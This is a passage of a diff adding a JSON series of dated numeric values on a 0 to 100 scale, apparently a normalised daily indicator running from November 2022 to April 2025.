"2022-11-25", + 84.90504688492483 + ], + [ + "2022-11-28", + 84.72140193644123 + ], + [ + "2022-11-29", + 82.36712225116634 + ], + [ + "2022-11-30", + 92.76783888237553 + ], + [ + "2022-12-01", + 87.56912841444255 + ], + [ + "2022-12-02", + 87.12090541982266 + ], + [ + "2022-12-05", + 83.04285149229915 + ], + [ + "2022-12-06", + 83.8778807514932 + ], + [ + "2022-12-07", + 82.90633234609443 + ], + [ + "2022-12-08", + 79.28692578534593 + ], + [ + "2022-12-09", + 30.74983157961132 + ], + [ + "2022-12-12", + 26.7869945101657 + ], + [ + "2022-12-13", + 27.317643064597036 + ], + [ + "2022-12-14", + 24.05601297170453 + ], + [ + "2022-12-15", + 23.64355168961302 + ], + [ + "2022-12-16", + 23.690071497470612 + ], + [ + "2022-12-19", + 24.334596230023372 + ], + [ + "2022-12-20", + 23.248513536745573 + ], + [ + "2022-12-21", + 21.509205097713153 + ], + [ + "2022-12-22", + 29.224316842834995 + ], + [ + "2022-12-23", + 28.961155058523342 + ], + [ + "2022-12-27", + 26.85545670399104 + ], + [ + "2022-12-28", + 27.630188817381136 + ], + [ + "2022-12-29", + 8.588665258071142 + ], + [ + "2022-12-30", + 8.724766360053426 + ], + [ + "2023-01-03", + 8.64125643902964 + ], + [ + "2023-01-04", + 14.27882869142117 + ], + [ + "2023-01-05", + 12.757886007038277 + ], + [ + "2023-01-06", + 27.11620354100921 + ], + [ + "2023-01-09", + 25.348963788707746 + ], + [ + "2023-01-10", + 26.014022428476153 + ], + [ + "2023-01-11", + 24.929011396209155 + ], + [ + "2023-01-12", + 23.968282275830326 + ], + [ + "2023-01-13", + 22.468860982680894 + ], + [ + "2023-01-17", + 10.07391968738559 + ], + [ + "2023-01-18", + 7.967316793190597 + ], + [ + "2023-01-19", + 12.719792325214199 + ], + [ + "2023-01-20", + 16.468075099450857 + ], + [ + "2023-01-23", + 27.95134950673962 + ], + [ + "2023-01-24", + 14.646406553292016 + ], + [ + "2023-01-25", + 14.433856571622542 + ], + [ + "2023-01-26", + 10.444244352815074 + ], + [ + "2023-01-27", + 7.904578511062106 + ], + [ + "2023-01-30", + 12.688303736675364 + ], + [ + "2023-01-31", + 13.096206494591833 + ], + [ + "2023-02-01", + 23.05546953261299 + ], + [ + "2023-02-02", + 22.533240498338063 + ], + [ + "2023-02-03", + 23.203239670433508 + ], + [ + "2023-02-06", + 18.645959275733528 + ], + [ + "2023-02-07", + 21.165953999645527 + ], + [ + "2023-02-08", + 25.912171315490497 + ], + [ + "2023-02-09", + 25.78164831908606 + ], + [ + "2023-02-10", + 28.18627189348706 + ], + [ + "2023-02-13", + 28.631066005966176 + ], + [ + "2023-02-14", + 29.687742145216177 + ], + [ + "2023-02-15", + 28.835127508576925 + ], + [ + "2023-02-16", + 27.517140835150087 + ], + [ + "2023-02-17", + 26.754938405680385 + ], + [ + "2023-02-21", + 18.753369569295824 + ], + [ + "2023-02-22", + 18.57243393710689 + ], + [ + "2023-02-23", + 24.221066956410827 + ], + [ + "2023-02-24", + 24.599116241588558 + ], + [ + "2023-02-27", + 24.525039672224537 + ], + [ + "2023-02-28", + 19.77235386245072 + ], + [ + "2023-03-01", + 18.04515488018554 + ], + [ + "2023-03-02", + 0.0 + ], + [ + "2023-03-03", + 0.0 + ], + [ + "2023-03-06", + 0.0 + ], + [ + "2023-03-07", + 0.0 + ], + [ + "2023-03-08", + 0.0 + ], + [ + "2023-03-09", + 0.0 + ], + [ + "2023-03-10", + 2.2699177011261513 + ], + [ + "2023-03-13", + 0.81606157614302 + ], + [ + "2023-03-14", + 5.983556957233737 + ], + [ + "2023-03-15", + 3.740680725422544 + ], + [ + "2023-03-16", + 15.304223990130495 + ], + [ + "2023-03-17", + 11.644764166012932 + ], + [ + "2023-03-20", + 10.179162788566504 + ], + [ + "2023-03-21", + 1.3429632753681553 + ], + [ + "2023-03-22", + 1.9907252391547632 + ], + [ + "2023-03-23", + 0.2548200011165767 + ], + [ + "2023-03-24", + 0.41794377396026666 + ], + [ + "2023-03-27", + 2.0352308069378453 + ], + [ + "2023-03-28", + 2.6220795905691334 + ], + [ + "2023-03-29", + 8.68749425347166 + ], + [ + "2023-03-30", + 9.900113196813978 + ], + [ + "2023-03-31", + 9.01868365899432 + ], + [ + "2023-04-03", + 8.660764154550565 + ], + [ + "2023-04-04", + 10.649729739030263 + ], + [ + "2023-04-05", + 8.885896411891835 + ], + [ + "2023-04-06", + 6.296537616672142 + ], + [ + "2023-04-10", + 4.217511456245884 + ], + [ + "2023-04-11", + 4.446185297193622 + ], + [ + "2023-04-12", + 1.9644187946919773 + ], + [ + "2023-04-13", + 1.036566951737767 + ], + [ + "2023-04-14", + 0.0 + ], + [ + "2023-04-17", + 0.0 + ], + [ + "2023-04-18", + 0.0 + ], + [ + "2023-04-19", + 0.7859114458675511 + ], + [ + "2023-04-20", + 0.3141867223110793 + ], + [ + "2023-04-21", + 0.0 + ], + [ + "2023-04-24", + 0.0 + ], + [ + "2023-04-25", + 6.689366488605156 + ], + [ + "2023-04-26", + 6.896595813016973 + ], + [ + "2023-04-27", + 0.0 + ], + [ + "2023-04-28", + 0.002843032117021082 + ], + [ + "2023-05-01", + 0.7466415789568918 + ], + [ + "2023-05-02", + 0.5963230260050497 + ], + [ + "2023-05-03", + 0.0 + ], + [ + "2023-05-04", + 0.0 + ], + [ + "2023-05-05", + 4.521267927585279 + ], + [ + "2023-05-08", + 2.3491101254179525 + ], + [ + "2023-05-09", + 4.044279185476507 + ], + [ + "2023-05-10", + 2.6593143710164404 + ], + [ + "2023-05-11", + 2.1726033069477526 + ], + [ + "2023-05-12", + 2.172784610732546 + ], + [ + "2023-05-15", + 8.074810596504346 + ], + [ + "2023-05-16", + 7.912061803133823 + ], + [ + "2023-05-17", + 11.219107933381304 + ], + [ + "2023-05-18", + 17.223223042253924 + ], + [ + "2023-05-19", + 17.23778953741849 + ], + [ + "2023-05-22", + 16.981433400784447 + ], + [ + "2023-05-23", + 9.018102289890347 + ], + [ + "2023-05-24", + 12.832718043014548 + ], + [ + "2023-05-25", + 36.04912511946903 + ], + [ + "2023-05-26", + 52.27700093289855 + ], + [ + "2023-05-30", + 52.61355796695257 + ], + [ + "2023-05-31", + 56.53032373630308 + ], + [ + "2023-06-01", + 55.02872834734096 + ], + [ + "2023-06-02", + 54.60222399732908 + ], + [ + "2023-06-05", + 56.374931682103224 + ], + [ + "2023-06-06", + 56.43577197149201 + ], + [ + "2023-06-07", + 54.21873524248241 + ], + [ + "2023-06-08", + 54.22921066516422 + ], + [ + "2023-06-09", + 53.52962308600425 + ], + [ + "2023-06-12", + 55.48248949385462 + ], + [ + "2023-06-13", + 54.37221430464577 + ], + [ + "2023-06-14", + 53.85482044213674 + ], + [ + "2023-06-15", + 54.413063686433524 + ], + [ + "2023-06-16", + 53.11903957320349 + ], + [ + "2023-06-20", + 53.42552367120843 + ], + [ + "2023-06-21", + 57.647254990368104 + ], + [ + "2023-06-22", + 56.32468797807357 + ], + [ + "2023-06-23", + 56.309236522986104 + ], + [ + "2023-06-26", + 38.487490533866676 + ], + [ + "2023-06-27", + 21.109409624487885 + ], + [ + "2023-06-28", + 21.78630069323638 + ], + [ + "2023-06-29", + 16.82680067944885 + ], + [ + "2023-06-30", + 16.524265665612784 + ], + [ + "2023-07-03", + 16.6581889933239 + ], + [ + "2023-07-05", + 18.345655250317154 + ], + [ + "2023-07-06", + 19.011110123394754 + ], + [ + "2023-07-07", + 18.978012607305146 + ], + [ + "2023-07-10", + 20.769993265337558 + ], + [ + "2023-07-11", + 20.786351942739888 + ], + [ + "2023-07-12", + 15.941452720806712 + ], + [ + "2023-07-13", + 17.648494946394404 + ], + [ + "2023-07-14", + 17.70875916592766 + ], + [ + "2023-07-17", + 20.546754848956876 + ], + [ + "2023-07-18", + 19.701700460099865 + ], + [ + "2023-07-19", + 20.29306790450275 + ], + [ + "2023-07-20", + 25.36511610417307 + ], + [ + "2023-07-21", + 25.619712917396114 + ], + [ + "2023-07-24", + 23.181594771245862 + ], + [ + "2023-07-25", + 24.37793924799212 + ], + [ + "2023-07-26", + 19.009120929145844 + ], + [ + "2023-07-27", + 20.27855713511865 + ], + [ + "2023-07-28", + 22.584830145705933 + ], + [ + "2023-07-31", + 21.728151860342933 + ], + [ + "2023-08-01", + 21.461284002891944 + ], + [ + "2023-08-02", + 28.15097233823569 + ], + [ + "2023-08-03", + 27.03522182355406 + ], + [ + "2023-08-04", + 27.191585330756723 + ], + [ + "2023-08-07", + 25.61486023037637 + ], + [ + "2023-08-08", + 27.325967734212185 + ], + [ + "2023-08-09", + 27.193794621595135 + ], + [ + "2023-08-10", + 23.99610071980988 + ], + [ + "2023-08-11", + 26.327641462870123 + ], + [ + "2023-08-14", + 28.099847143435436 + ], + [ + "2023-08-15", + 28.945184747943408 + ], + [ + "2023-08-16", + 30.042847527578004 + ], + [ + "2023-08-17", + 23.468009767335182 + ], + [ + "2023-08-18", + 22.902022624067193 + ], + [ + "2023-08-21", + 28.944807464834415 + ], + [ + "2023-08-22", + 26.99140863391604 + ], + [ + "2023-08-23", + 29.02776033939277 + ], + [ + "2023-08-24", + 31.65567350935809 + ], + [ + "2023-08-25", + 28.170940848000935 + ], + [ + "2023-08-28", + 29.519182490742917 + ], + [ + "2023-08-29", + 34.371974404479694 + ], + [ + "2023-08-30", + 26.91242875073857 + ], + [ + "2023-08-31", + 27.22558402891051 + ], + [ + "2023-09-01", + 27.196934811350783 + ], + [ + "2023-09-05", + 26.46480163734804 + ], + [ + "2023-09-06", + 25.38364905422521 + ], + [ + "2023-09-07", + 26.314194718100097 + ], + [ + "2023-09-08", + 26.40128791262532 + ], + [ + "2023-09-11", + 22.553683378589056 + ], + [ + "2023-09-12", + 17.38712418619346 + ], + [ + "2023-09-13", + 15.785774370691783 + ], + [ + "2023-09-14", + 13.083951904234167 + ], + [ + "2023-09-15", + 18.535395245547008 + ], + [ + "2023-09-18", + 18.466234321036954 + ], + [ + "2023-09-19", + 12.505197447377455 + ], + [ + "2023-09-20", + 13.801712742308721 + ], + [ + "2023-09-21", + 11.89481928874228 + ], + [ + "2023-09-22", + 5.840584336953782 + ], + [ + "2023-09-25", + 6.230296871971896 + ], + [ + "2023-09-26", + 6.364603569530046 + ], + [ + "2023-09-27", + 0.0 + ], + [ + "2023-09-28", + 3.811738176966823 + ], + [ + "2023-09-29", + 3.4184269783203645 + ], + [ + "2023-10-02", + 3.594197040458005 + ], + [ + "2023-10-03", + 5.913620068875717 + ], + [ + "2023-10-04", + 8.527263224235904 + ], + [ + "2023-10-05", + 5.386947379817394 + ], + [ + "2023-10-06", + 9.128870447704447 + ], + [ + "2023-10-09", + 9.126169205340398 + ], + [ + "2023-10-10", + 9.979778615230874 + ], + [ + "2023-10-11", + 10.294985721043119 + ], + [ + "2023-10-12", + 9.984737283327021 + ], + [ + "2023-10-13", + 9.433333721717288 + ], + [ + "2023-10-16", + 11.108928062614023 + ], + [ + "2023-10-17", + 11.209326751406667 + ], + [ + "2023-10-18", + 11.563752632896712 + ], + [ + "2023-10-19", + 10.562050915601914 + ], + [ + "2023-10-20", + 11.747630239727037 + ], + [ + "2023-10-23", + 11.326813993511724 + ], + [ + "2023-10-24", + 10.507576904600779 + ], + [ + "2023-10-25", + 21.15042167750499 + ], + [ + "2023-10-26", + 18.13189652430412 + ], + [ + "2023-10-27", + 18.711111052258484 + ], + [ + "2023-10-30", + 18.871447152499943 + ], + [ + "2023-10-31", + 17.740885851140582 + ], + [ + "2023-11-01", + 20.541662977630192 + ], + [ + "2023-11-02", + 24.66121730798076 + ], + [ + "2023-11-03", + 26.411686797607896 + ], + [ + "2023-11-06", + 26.4262717794129 + ], + [ + "2023-11-07", + 25.803702895246804 + ], + [ + "2023-11-08", + 25.364630389252774 + ], + [ + "2023-11-09", + 25.345029513317364 + ], + [ + "2023-11-10", + 30.449819574310773 + ], + [ + "2023-11-13", + 30.068946898178634 + ], + [ + "2023-11-14", + 35.93372106402874 + ], + [ + "2023-11-15", + 33.50709512359688 + ], + [ + "2023-11-16", + 31.23702676440293 + ], + [ + "2023-11-17", + 28.7019021383922 + ], + [ + "2023-11-20", + 28.346381372297447 + ], + [ + "2023-11-21", + 31.70094124684097 + ], + [ + "2023-11-22", + 17.627993729607176 + ], + [ + "2023-11-24", + 16.698910476311458 + ], + [ + "2023-11-27", + 17.32698795692011 + ], + [ + "2023-11-28", + 15.770722482904478 + ], + [ + "2023-11-29", + 15.805585330516578 + ], + [ + "2023-11-30", + 15.051381050840062 + ], + [ + "2023-12-01", + 13.279866864136244 + ], + [ + "2023-12-04", + 11.684388802663442 + ], + [ + "2023-12-05", + 12.291516232699898 + ], + [ + "2023-12-06", + 13.029762994506008 + ], + [ + "2023-12-07", + 17.459091774483902 + ], + [ + "2023-12-08", + 17.390279414281874 + ], + [ + "2023-12-11", + 21.940664855503663 + ], + [ + "2023-12-12", + 19.342547766227945 + ], + [ + "2023-12-13", + 7.515155800441238 + ], + [ + "2023-12-14", + 14.918248101901282 + ], + [ + "2023-12-15", + 14.721233648781643 + ], + [ + "2023-12-18", + 15.632070463719701 + ], + [ + "2023-12-19", + 14.02857134638477 + ], + [ + "2023-12-20", + 21.876241583669216 + ], + [ + "2023-12-21", + 28.12827955371559 + ], + [ + "2023-12-22", + 28.019639645208155 + ], + [ + "2023-12-26", + 29.313206746427777 + ], + [ + "2023-12-27", + 27.588353672564885 + ], + [ + "2023-12-28", + 28.104918390658497 + ], + [ + "2023-12-29", + 28.951383718202596 + ], + [ + "2024-01-02", + 47.77827260799193 + ], + [ + "2024-01-03", + 52.03722161036226 + ], + [ + "2024-01-04", + 52.638556378353684 + ], + [ + "2024-01-05", + 51.534116744486134 + ], + [ + "2024-01-08", + 54.46921038693813 + ], + [ + "2024-01-09", + 54.48412597936832 + ], + [ + "2024-01-10", + 44.514105167780635 + ], + [ + "2024-01-11", + 44.24755929438356 + ], + [ + "2024-01-12", + 42.12344196915402 + ], + [ + "2024-01-16", + 35.68109492953232 + ], + [ + "2024-01-17", + 36.21971477236026 + ], + [ + "2024-01-18", + 47.75942469669745 + ], + [ + "2024-01-19", + 61.8464472848938 + ], + [ + "2024-01-22", + 51.433875063864896 + ], + [ + "2024-01-23", + 46.06478291191077 + ], + [ + "2024-01-24", + 47.20890620953686 + ], + [ + "2024-01-25", + 45.270308392739416 + ], + [ + "2024-01-26", + 54.748968009164265 + ], + [ + "2024-01-29", + 55.386868839751976 + ], + [ + "2024-01-30", + 56.946991782677 + ], + [ + "2024-01-31", + 44.79340738760325 + ], + [ + "2024-02-01", + 37.99126920408888 + ], + [ + "2024-02-02", + 36.75730216143554 + ], + [ + "2024-02-05", + 37.7244628985946 + ], + [ + "2024-02-06", + 31.762751220429237 + ], + [ + "2024-02-07", + 33.17692845790569 + ], + [ + "2024-02-08", + 34.34371082163174 + ], + [ + "2024-02-09", + 36.63241674099372 + ], + [ + "2024-02-12", + 36.06574963287869 + ], + [ + "2024-02-13", + 42.411295704696464 + ], + [ + "2024-02-14", + 43.01414213992686 + ], + [ + "2024-02-15", + 34.69520775532941 + ], + [ + "2024-02-16", + 19.20321853131074 + ], + [ + "2024-02-20", + 23.450310052034666 + ], + [ + "2024-02-21", + 23.169645210538132 + ], + [ + "2024-02-22", + 47.83601303106646 + ], + [ + "2024-02-23", + 49.145353590896 + ], + [ + "2024-02-26", + 39.21912546999834 + ], + [ + "2024-02-27", + 38.891222583045035 + ], + [ + "2024-02-28", + 37.53932765251875 + ], + [ + "2024-02-29", + 38.80777466600609 + ], + [ + "2024-03-01", + 53.19589642994455 + ], + [ + "2024-03-04", + 52.99863149739444 + ], + [ + "2024-03-05", + 59.05091561890785 + ], + [ + "2024-03-06", + 58.85763778241518 + ], + [ + "2024-03-07", + 64.95938137294277 + ], + [ + "2024-03-08", + 82.22975671944019 + ], + [ + "2024-03-11", + 83.49023377381702 + ], + [ + "2024-03-12", + 85.33048165343136 + ], + [ + "2024-03-13", + 87.0060592926102 + ], + [ + "2024-03-14", + 88.57070041386139 + ], + [ + "2024-03-15", + 89.10282067045794 + ], + [ + "2024-03-18", + 88.5647345363963 + ], + [ + "2024-03-19", + 86.53310256395281 + ], + [ + "2024-03-20", + 87.53969701778847 + ], + [ + "2024-03-21", + 72.92382255006072 + ], + [ + "2024-03-22", + 71.46628899740858 + ], + [ + "2024-03-25", + 71.55304127673294 + ], + [ + "2024-03-26", + 72.12709026923233 + ], + [ + "2024-03-27", + 71.12161822178619 + ], + [ + "2024-03-28", + 66.36212011764657 + ], + [ + "2024-04-01", + 50.119576777437224 + ], + [ + "2024-04-02", + 51.21222861804551 + ], + [ + "2024-04-03", + 47.33413685714616 + ], + [ + "2024-04-04", + 48.11402498721277 + ], + [ + "2024-04-05", + 34.724863865174825 + ], + [ + "2024-04-08", + 18.68931659051145 + ], + [ + "2024-04-09", + 17.768197234130646 + ], + [ + "2024-04-10", + 14.961314074903607 + ], + [ + "2024-04-11", + 14.527698180646833 + ], + [ + "2024-04-12", + 23.189579856007043 + ], + [ + "2024-04-15", + 25.09529630590006 + ], + [ + "2024-04-16", + 25.72300526862012 + ], + [ + "2024-04-17", + 34.47405921770011 + ], + [ + "2024-04-18", + 33.9262834393194 + ], + [ + "2024-04-19", + 39.292736803472 + ], + [ + "2024-04-22", + 43.20112245727165 + ], + [ + "2024-04-23", + 50.60689359936498 + ], + [ + "2024-04-24", + 53.68870784898555 + ], + [ + "2024-04-25", + 56.257696187927664 + ], + [ + "2024-04-26", + 61.78331124685985 + ], + [ + "2024-04-29", + 61.01882531754138 + ], + [ + "2024-04-30", + 62.54974671226137 + ], + [ + "2024-05-01", + 70.62702542363749 + ], + [ + "2024-05-02", + 70.06036906093594 + ], + [ + "2024-05-03", + 74.34106316002332 + ], + [ + "2024-05-06", + 77.99002401619991 + ], + [ + "2024-05-07", + 77.27434880979841 + ], + [ + "2024-05-08", + 75.01453908147842 + ], + [ + "2024-05-09", + 70.74891416461706 + ], + [ + "2024-05-10", + 62.8437714823608 + ], + [ + "2024-05-13", + 60.77407954501554 + ], + [ + "2024-05-14", + 62.50264932187831 + ], + [ + "2024-05-15", + 59.371725376737864 + ], + [ + "2024-05-16", + 54.528515440268336 + ], + [ + "2024-05-17", + 33.46294785168888 + ], + [ + "2024-05-20", + 35.20119658236964 + ], + [ + "2024-05-21", + 33.5567841986781 + ], + [ + "2024-05-22", + 33.05044857916253 + ], + [ + "2024-05-23", + 32.136545284344294 + ], + [ + "2024-05-24", + 30.923272347325774 + ], + [ + "2024-05-28", + 32.61898868733359 + ], + [ + "2024-05-29", + 31.97976925198404 + ], + [ + "2024-05-30", + 13.72526643679029 + ], + [ + "2024-05-31", + 14.090195805206514 + ], + [ + "2024-06-03", + 9.309022248678447 + ], + [ + "2024-06-04", + 6.605137746248715 + ], + [ + "2024-06-05", + 24.919873350049528 + ], + [ + "2024-06-06", + 26.2687588174137 + ], + [ + "2024-06-07", + 26.345822630149733 + ], + [ + "2024-06-10", + 27.064975169684054 + ], + [ + "2024-06-11", + 27.11359096594385 + ], + [ + "2024-06-12", + 32.21098235187353 + ], + [ + "2024-06-13", + 25.532745407518085 + ], + [ + "2024-06-14", + 25.270080960533964 + ], + [ + "2024-06-17", + 24.64589724603979 + ], + [ + "2024-06-18", + 22.404666307303174 + ], + [ + "2024-06-20", + 34.25164812736041 + ], + [ + "2024-06-21", + 36.88501869651731 + ], + [ + "2024-06-24", + 47.53023763449917 + ], + [ + "2024-06-25", + 50.73811579386165 + ], + [ + "2024-06-26", + 47.93736107273317 + ], + [ + "2024-06-27", + 43.53514462655529 + ], + [ + "2024-06-28", + 43.48935621418667 + ], + [ + "2024-07-01", + 41.76259619364093 + ], + [ + "2024-07-02", + 43.09345840641544 + ], + [ + "2024-07-03", + 43.558241208400936 + ], + [ + "2024-07-05", + 23.39662776914171 + ], + [ + "2024-07-08", + 25.938280006600955 + ], + [ + "2024-07-09", + 25.267024966306884 + ], + [ + "2024-07-10", + 28.96041690286492 + ], + [ + "2024-07-11", + 46.02235382150704 + ], + [ + "2024-07-12", + 38.285927104744836 + ], + [ + "2024-07-15", + 36.780428396034296 + ], + [ + "2024-07-16", + 36.6108649136964 + ], + [ + "2024-07-17", + 89.34819309801978 + ], + [ + "2024-07-18", + 86.84320345024136 + ], + [ + "2024-07-19", + 88.51389298510503 + ], + [ + "2024-07-22", + 100.0 + ], + [ + "2024-07-23", + 95.10295071865454 + ], + [ + "2024-07-24", + 100.0 + ], + [ + "2024-07-25", + 100.0 + ], + [ + "2024-07-26", + 100.0 + ], + [ + "2024-07-29", + 98.96563764431015 + ], + [ + "2024-07-30", + 100.0 + ], + [ + "2024-07-31", + 100.0 + ], + [ + "2024-08-01", + 100.0 + ], + [ + "2024-08-02", + 100.0 + ], + [ + "2024-08-05", + 97.37949759888875 + ], + [ + "2024-08-06", + 98.18224777455606 + ], + [ + "2024-08-07", + 95.1054603276183 + ], + [ + "2024-08-08", + 100.0 + ], + [ + "2024-08-09", + 99.08031911143867 + ], + [ + "2024-08-12", + 99.27901651617677 + ], + [ + "2024-08-13", + 100.0 + ], + [ + "2024-08-14", + 90.32705557858979 + ], + [ + "2024-08-15", + 96.17209396398766 + ], + [ + "2024-08-16", + 94.22913281867959 + ], + [ + "2024-08-19", + 90.3858105654136 + ], + [ + "2024-08-20", + 90.213037579696 + ], + [ + "2024-08-21", + 84.4019990969064 + ], + [ + "2024-08-22", + 85.85619964695549 + ], + [ + "2024-08-23", + 86.66861593841885 + ], + [ + "2024-08-26", + 88.31312616838082 + ], + [ + "2024-08-27", + 84.9295304786231 + ], + [ + "2024-08-28", + 74.89788989389419 + ], + [ + "2024-08-29", + 60.15204125483231 + ], + [ + "2024-08-30", + 50.42051722503356 + ], + [ + "2024-09-03", + 69.08801799718006 + ], + [ + "2024-09-04", + 68.9925266976023 + ], + [ + "2024-09-05", + 66.481282689856 + ], + [ + "2024-09-06", + 58.7840106146864 + ], + [ + "2024-09-09", + 60.067827714167564 + ], + [ + "2024-09-10", + 60.43496628314823 + ], + [ + "2024-09-11", + 61.65821806801712 + ], + [ + "2024-09-12", + 61.696154727215834 + ], + [ + "2024-09-13", + 55.4731015841658 + ], + [ + "2024-09-16", + 55.8461126377881 + ], + [ + "2024-09-17", + 54.73074184169544 + ], + [ + "2024-09-18", + 54.64592276959718 + ], + [ + "2024-09-19", + 60.428456686499224 + ], + [ + "2024-09-20", + 57.618071237095926 + ], + [ + "2024-09-23", + 55.298158088599045 + ], + [ + "2024-09-24", + 53.880052720371616 + ], + [ + "2024-09-25", + 53.677477516878945 + ], + [ + "2024-09-26", + 56.813762697180415 + ], + [ + "2024-09-27", + 56.65070950996438 + ], + [ + "2024-09-30", + 55.19844562639802 + ], + [ + "2024-10-01", + 35.89040591325286 + ], + [ + "2024-10-02", + 36.05722367603355 + ], + [ + "2024-10-03", + 35.68754554505152 + ], + [ + "2024-10-04", + 25.869497902514087 + ], + [ + "2024-10-07", + 25.37622258347817 + ], + [ + "2024-10-08", + 25.297624970722545 + ], + [ + "2024-10-09", + 16.652917877466848 + ], + [ + "2024-10-10", + 16.899428929810572 + ], + [ + "2024-10-11", + 15.923990496595739 + ], + [ + "2024-10-14", + 15.677201167908569 + ], + [ + "2024-10-15", + 30.83558287289989 + ], + [ + "2024-10-16", + 30.129189595517552 + ], + [ + "2024-10-17", + 22.1202788138613 + ], + [ + "2024-10-18", + 20.81988583413877 + ], + [ + "2024-10-21", + 20.832746545558134 + ], + [ + "2024-10-22", + 20.278139899584197 + ], + [ + "2024-10-23", + 20.43746235991787 + ], + [ + "2024-10-24", + 12.700662674488877 + ], + [ + "2024-10-25", + 12.01080565567545 + ], + [ + "2024-10-28", + 11.611778594052941 + ], + [ + "2024-10-29", + 10.634493368882577 + ], + [ + "2024-10-30", + 17.589978252575683 + ], + [ + "2024-10-31", + 24.787135862657188 + ], + [ + "2024-11-01", + 24.037259813387713 + ], + [ + "2024-11-04", + 24.075811234025625 + ], + [ + "2024-11-05", + 24.293395805544552 + ], + [ + "2024-11-06", + 28.219132924668717 + ], + [ + "2024-11-07", + 30.130650461304988 + ], + [ + "2024-11-08", + 30.066550935546736 + ], + [ + "2024-11-11", + 30.560333154655666 + ], + [ + "2024-11-12", + 18.71099388498325 + ], + [ + "2024-11-13", + 20.691905062275477 + ], + [ + "2024-11-14", + 20.229536701760882 + ], + [ + "2024-11-15", + 24.69390380140312 + ], + [ + "2024-11-18", + 25.98122400813226 + ], + [ + "2024-11-19", + 26.12049748851178 + ], + [ + "2024-11-20", + 26.123986076356026 + ], + [ + "2024-11-21", + 27.661917801340152 + ], + [ + "2024-11-22", + 26.97276753072447 + ], + [ + "2024-11-25", + 27.667810274399457 + ], + [ + "2024-11-26", + 24.300787425709487 + ], + [ + "2024-11-27", + 19.883322251662772 + ], + [ + "2024-11-29", + 13.865365131743163 + ], + [ + "2024-12-02", + 17.225206634328412 + ], + [ + "2024-12-03", + 17.225084938950673 + ], + [ + "2024-12-04", + 17.43428055515233 + ], + [ + "2024-12-05", + 14.111200133841981 + ], + [ + "2024-12-06", + 11.349931377730565 + ], + [ + "2024-12-09", + 11.240164778708346 + ], + [ + "2024-12-10", + 11.211796566191312 + ], + [ + "2024-12-11", + 15.111673795863414 + ], + [ + "2024-12-12", + 13.017792798871708 + ], + [ + "2024-12-13", + 16.85623147137905 + ], + [ + "2024-12-16", + 11.280504979496056 + ], + [ + "2024-12-17", + 12.49671201561517 + ], + [ + "2024-12-18", + 20.06169027215051 + ], + [ + "2024-12-19", + 21.449387104327137 + ], + [ + "2024-12-20", + 20.827466008025816 + ], + [ + "2024-12-23", + 24.93633025037692 + ], + [ + "2024-12-24", + 24.953263117820487 + ], + [ + "2024-12-26", + 23.80806311841112 + ], + [ + "2024-12-27", + 23.255922070295508 + ], + [ + "2024-12-30", + 24.727062743795777 + ], + [ + "2024-12-31", + 21.64930946003825 + ], + [ + "2025-01-02", + 21.69954375687779 + ], + [ + "2025-01-03", + 24.293460588452778 + ], + [ + "2025-01-06", + 26.30625784767976 + ], + [ + "2025-01-07", + 27.418141334825986 + ], + [ + "2025-01-08", + 27.915928038103804 + ], + [ + "2025-01-10", + 27.59856653259898 + ], + [ + "2025-01-13", + 24.661277748613866 + ], + [ + "2025-01-14", + 24.42071173697496 + ], + [ + "2025-01-15", + 23.320866715840314 + ], + [ + "2025-01-16", + 21.283748426886103 + ], + [ + "2025-01-17", + 24.089961860882884 + ], + [ + "2025-01-21", + 17.111737251280108 + ], + [ + "2025-01-22", + 14.737203364591739 + ], + [ + "2025-01-23", + 14.682060101781639 + ], + [ + "2025-01-24", + 14.465390761248967 + ], + [ + "2025-01-27", + 41.998778649979805 + ], + [ + "2025-01-28", + 42.1181391843164 + ], + [ + "2025-01-29", + 42.02081858282842 + ], + [ + "2025-01-30", + 42.101099499819426 + ], + [ + "2025-01-31", + 41.86203993814249 + ], + [ + "2025-02-03", + 43.001559641679385 + ], + [ + "2025-02-04", + 40.51367726909482 + ], + [ + "2025-02-05", + 38.12830753728048 + ], + [ + "2025-02-06", + 37.51319602686432 + ], + [ + "2025-02-07", + 38.1126890748552 + ], + [ + "2025-02-10", + 36.68626259446005 + ], + [ + "2025-02-11", + 36.6498704972946 + ], + [ + "2025-02-12", + 36.62452720951175 + ], + [ + "2025-02-13", + 35.2063957532685 + ], + [ + "2025-02-14", + 35.208988826811755 + ], + [ + "2025-02-18", + 33.05772395228709 + ], + [ + "2025-02-19", + 33.59658623856102 + ], + [ + "2025-02-20", + 32.63428380130111 + ], + [ + "2025-02-21", + 36.19015928977829 + ], + [ + "2025-02-24", + 36.53996865319674 + ], + [ + "2025-02-25", + 8.96337062594268 + ], + [ + "2025-02-26", + 10.418169558255558 + ], + [ + "2025-02-27", + 27.705586461317594 + ], + [ + "2025-02-28", + 26.961381161808944 + ], + [ + "2025-03-03", + 30.96832704057838 + ], + [ + "2025-03-04", + 30.227699517799632 + ], + [ + "2025-03-05", + 32.19428407310617 + ], + [ + "2025-03-06", + 36.16041575558479 + ], + [ + "2025-03-07", + 40.59878019995067 + ], + [ + "2025-03-10", + 46.73356401468644 + ], + [ + "2025-03-11", + 45.48849142365825 + ], + [ + "2025-03-12", + 47.325702799078506 + ], + [ + "2025-03-13", + 47.13013212473721 + ], + [ + "2025-03-14", + 51.08543667757217 + ], + [ + "2025-03-17", + 52.57116872110792 + ], + [ + "2025-03-18", + 51.17828668395765 + ], + [ + "2025-03-19", + 50.03402849293336 + ], + [ + "2025-03-20", + 49.75672378892105 + ], + [ + "2025-03-21", + 47.69057781948102 + ], + [ + "2025-03-24", + 50.54032133118616 + ], + [ + "2025-03-25", + 49.3585543772184 + ], + [ + "2025-03-26", + 50.26679578868147 + ], + [ + "2025-03-27", + 39.98557283672054 + ], + [ + "2025-03-28", + 41.8901584776961 + ], + [ + "2025-03-31", + 38.662739943926425 + ], + [ + "2025-04-01", + 38.57817899398178 + ], + [ + "2025-04-02", + 36.46342130131908 + ], + [ + "2025-04-03", + 63.57570303720485 + ], + [ + "2025-04-04", + 73.29892811139564 + ], + [ + "2025-04-07", + 71.78907675619293 + ], + [ + "2025-04-08", + 73.31379249364448 + ], + [ + "2025-04-09", + 100.0 + ], + [ + "2025-04-10", + 100.0 + ], + [ + "2025-04-11", + 100.0 + ], + [ + "2025-04-14", + 100.0 + ], + [ + "2025-04-15", + 100.0 + ], + [ + "2025-04-16", + 100.0 + ], + [ + "2025-04-17", + 100.0 + ], + [ + "2025-04-21", + 100.0 + ], + [ + "2025-04-22", + 100.0 + ], + [ + "2025-04-23", + 100.0 + ], + [ + "2025-04-24", + 100.0 + ], + [ + "2025-04-25", + 100.0 + ], + [ + "2025-04-28", + 